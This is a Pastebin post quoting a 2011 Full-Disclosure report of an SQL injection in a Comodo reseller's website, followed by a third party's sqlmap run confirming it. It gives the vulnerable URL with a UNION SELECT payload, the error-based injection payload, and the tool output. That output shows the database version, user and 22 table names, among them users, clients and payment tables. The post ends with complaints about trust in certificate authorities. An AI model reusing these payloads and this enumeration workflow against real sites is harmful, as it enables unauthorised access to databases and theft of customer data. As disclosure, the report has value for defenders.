Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Received: from [199.48.147.35] by web120908.mail.ne1.yahoo.com via HTTP;
- Sun, 22 May 2011 11:20:54 PDT
- X-Mailer: YahooMailClassic/14.0.1 YahooMailWebService/0.8.111.303096
- Date: Sun, 22 May 2011 11:20:54 -0700 (PDT)
- From: Hgkdfhklj Jdhglkjfdhg <gimmemyfiles@ymail.com>
- X-Mailman-Approved-At: Sun, 22 May 2011 19:35:39 +0100
- Cc: suporte@comodobr.com
- Subject: [Full-disclosure] comodobr.com sqli
- vulnerable link:
- https://www.comodobr.com/comprar/compra_codesigning.php?prod=8 UNION ALL
- SELECT 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14 -- -
- http://pastebin.com/9qwdL1pA
- _______________________________________________
- Full-Disclosure - We believe in it.
- Charter: http://lists.grok.org.uk/full-disclosure-charter.html
- Hosted and sponsored by Secunia - http://secunia.com/
- ---------------------------------------------------------------------
- PS C:\Python27> nslookup 199.48.147.35
- Server: google-public-dns-a.google.com
- Address: 8.8.8.8
- Name: tor-exit-router35-readme.formlessnetworking.net
- Address: 199.48.147.35
- >>> You're not going to find him... <<<
- >>> Let's check the host: <<<>>><<<>>><
- PS C:\Python27> .\python.exe C:\sqlmap-0.9\sqlmap.py --wizard
- sqlmap/0.9 - automatic SQL injection and database takeover tool
- http://sqlmap.sourceforge.net
- [*] starting at: 21:00:00
- Please enter full target URL (-u): https://www.comodobr.com/comprar/compra_codesigning.php?prod=8
- POST data (--data) [Enter for None]:
- Injection difficulty (--level/--risk). Please choose:
- [1] Normal (default)
- [2] Medium
- [3] Hard
- > 1
- Enumeration (--banner/--current-user/etc). Please choose:
- [1] Basic (default)
- [2] Smart
- [3] All
- > 1
- sqlmap is running, please wait..
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: prod
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: prod=8 AND (SELECT 1198 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,109,109,58),(SELECT (CASE WHEN (1198=1198)
- THEN 1 ELSE 0 END)),CHAR(58,114,117,115,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
- ---
- [21:00:00] [INFO] retrieved: 5.0.91-community-log
- web application technology: PHP 5.2.6, Apache 2.0.63
- back-end DBMS: MySQL 5.0
- banner: '5.0.91-community-log'
- [21:00:00] [INFO] retrieved: comodobr_site@localhost
- current user: 'comodobr_site@localhost'
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- current database: 'comodobr_comodobr'
- current user is DBA: 'False'
- [*] shutting down at: 21:00:00
- PS C:\Python27>
- >>> Looks real <<<>>><<<>>><<<>>><<<>>>
- >>> Let's see the inside of the db: <<<
- web application technology: PHP 5.2.6, Apache 2.0.63
- back-end DBMS: MySQL 5.0
- banner: '5.0.91-community-log'
- current user: 'comodobr_site@localhost'
- current database: 'comodobr_comodobr'
- current user is DBA: 'False'
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_boleto
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_boleto_associa
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_boleto_categoria
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_boleto_importado
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_boleto_status
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_confirm_pago
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_contab
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_expected_delivery_time
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_hosting_contas
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_meios_pago
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_pedido_status
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_pedido_status_codes
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_pedidos
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_pedidos_historico
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_prod_grupos
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_prods
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_resellers
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_server_software
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_users
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_vw_crm_clientes
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_webhostreport_item
- [21:00:00] [INFO] retrieved: comodobr_comodobr
- [21:00:00] [INFO] retrieved: comodo_webhostreport_subitem
- Database: comodobr_comodobr
- [22 tables]
- +-------------------------------+
- | comodo_boleto |
- | comodo_boleto_associa |
- | comodo_boleto_categoria |
- | comodo_boleto_importado |
- | comodo_boleto_status |
- | comodo_confirm_pago |
- | comodo_contab |
- | comodo_expected_delivery_time |
- | comodo_hosting_contas |
- | comodo_meios_pago |
- | comodo_pedido_status |
- | comodo_pedido_status_codes |
- | comodo_pedidos |
- | comodo_pedidos_historico |
- | comodo_prod_grupos |
- | comodo_prods |
- | comodo_resellers |
- | comodo_server_software |
- | comodo_users |
- | comodo_vw_crm_clientes |
- | comodo_webhostreport_item |
- | comodo_webhostreport_subitem |
- +-------------------------------+
- [*] shutting down at: 21:00:00
- PS C:\Python27>
- When are comodo going to fix this? How come comodo is a CA? They shouldn't be trusted! And what about TÜRKTRUST.. Who the HELL are they? I don't trust them, but they are still a CA in my browser.. WHY? When are we going to see private certs from paypal, google, etc? Why does Firefox restore all my CA's, when I delete them in the "Certificate Manager"? Do we *STILL* trust https? What's next?
- GET YOUR SHIT TOGETHER.
- EDIT: I'm not the "hacker". The "real hacker" is here: http://pastebin.com/u/gimmemyfiles
- I've just checked his claims, which was true. Everyone can claim that they hacked comodo, but that the vulnerable was fixed, so all I have done is open sqlmap and tested :-)
- Also here's a new response:
- Received: from [199.48.147.35] by web120910.mail.ne1.yahoo.com via HTTP;
- Tue, 24 May 2011 14:58:39 PDT
- X-Mailer: YahooMailWebService/0.8.111.303096
- Date: Tue, 24 May 2011 14:58:39 -0700 (PDT)
- From: Hgkdfhklj Jdhglkjfdhg <gimmemyfiles AT ymail.com>
- Cc: "support@comodobr.com" <support@comodobr.com>
- Subject: [Full-disclosure] My comments on comodobr.com
- I have to agree with Comodo president and CEO, Melih Abdulhayoglu.
- In fact, anyone that can use sqlmap or pangolin and knows how to google for "filetype:php inurl:prod" could have found that sqli.
- However the same way the security perimeter of the mainframe _should_ be extended to the desktops connected to it, it might be a good idea for resellers and partners to tighten own their own security. further compromise of comodobr.com systems (_if_possible_) could have been a foothold into Comodo's systems.
- Just my 50 cents
- [Edit]
- The db dump was partial because the only thing omitted from the db dump was request logs. Either way, CSR's and client info shouldn't be "readily available" as this.
- No beef with comodobr.com or Comodo, just with companies in the security business that don't take care of their own.
- That's one of the reasons we have been trying to make the internet secure for so long. Some people just don't help.
- http://pastebin.com/MFSUdCnk
- _______________________________________________
- Full-Disclosure - We believe in it.
- Hosted and sponsored by Secunia - http://secunia.com/
- PS C:\Users\Nicolai> nslookup 199.48.147.35
- Server: google-public-dns-a.google.com
- Address: 8.8.8.8
- Name: tor-exit-router35-readme.formlessnetworking.net
- Address: 199.48.147.35
- PS C:\Users\Nicolai>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement